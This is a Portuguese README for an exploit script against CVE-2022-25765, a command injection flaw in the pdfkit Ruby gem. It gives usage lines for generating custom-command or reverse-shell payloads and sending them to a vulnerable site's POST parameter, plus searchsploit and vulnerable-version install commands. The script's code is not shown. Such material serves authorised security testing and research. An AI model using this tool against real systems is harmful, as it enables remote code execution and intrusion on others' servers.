
Exploit para CVE-2022–25765 (pdfkit) - Injeção de Comandos

Gostou deste repositório? Dê-nos uma ⭐!
Apenas para fins educacionais e de pesquisa de segurança autorizada.
@UNICORDev por (@NicPWNs e @Dev-Yeoj)
O pacote pdfkit desde a versão 0.0.0 é vulnerável à Injeção de Comandos, onde a URL não é devidamente sanitizada.
A gem ruby pdfkit é comumente usada para converter sites ou HTML em documentos PDF. Versões vulneráveis (< 0.8.7.2) deste software podem receber uma URL especialmente criada contendo um comando que será executado. Este exploit gera URLs executáveis ou as envia para um site vulnerável executando pdfkit.
python3 exploit-CVE-2022–25765.py -c <command>
python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port>
python3 exploit-CVE-2022–25765.py -c <command> [-w <http://target.com/index.html> -p <parameter>]
python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port> [-w <http://target.com/index.html> -p <parameter>]
python3 exploit-CVE-2022–25765.py -h
-c Modo de comando personalizado. Forneça o comando para gerar payload personalizado.
-s Modo de reverse shell. Forneça IP local e porta para gerar payload de reverse shell.
-w URL do site executando pdfkit vulnerável. (Opcional)
-p Parâmetro POST no site executando pdfkit vulnerável. (Opcional)
-h Mostra este menu de ajuda.
searchsploit -u
searchsploit -m 51293


pdfkit Versão 0.8.6
pdfkit Versões < 0.8.7.2
gem install pdfkit -v 0.8.6